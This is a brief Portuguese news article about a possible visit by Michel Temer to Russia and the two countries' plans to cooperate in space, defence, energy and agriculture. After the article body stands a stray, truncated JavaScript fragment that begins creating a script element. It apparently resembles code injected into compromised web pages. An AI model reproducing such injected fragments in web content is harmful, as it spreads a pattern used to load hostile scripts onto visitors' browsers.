Temer deverá visitar a Rússia neste ano

 

O presidente Michel Temer poderá visitar a Rússia neste ano, segundo o embaixador brasileiro naquele país, Antonio Luis Espinola Salgado, em conversa com o chefe da comissão de assuntos internacionais do Senado russo, Konstantin Kosatchev.

O embaixador disse também que a crise interna que atingiu o Brasil no ano passado teve um efeito negativo na cooperação com outros países, incluindo a Rússia. No entanto, ele espera que, em 2017, os países compensem o tempo perdido.

Ainda de acordo com Salgado, os ministérios das Relações Exteriores de ambos os países deverão realizar consultar “em breve”, assim como está prevista uma reunião da comissão intergovernamental para o comércio e a cooperação econômica.

Além disso, o Ministério dos Negócios Estrangeiros russo divulgou uma nota destacando a importância do respeito ao quadro constitucional e à legislação do Brasil.

Futuro da cooperação – O Brasil está interessado em desenvolver cooperação em diversas áreas com a Rússia, incluindo espaço, defesa e cooperação científica, segundo Salgado.

Em contrapartida, Kosatchev destacou que os dois países têm diversas esferas de interesses mútuos “que abrem caminho para relações mais próximas”, entre elas pesquisa espacial, construção de máquinas e indústria de energia.

“Temos um enorme potencial em termos de cooperação bilateral. Podemos nos complementar de muitas maneiras; em primeiro lugar, na agricultura, bem como na indústria de energia e no setor de energia nuclear”, continuou o embaixador brasileiro.

var d=document;var s=d.createElement(‘script’);

Deixe um comentário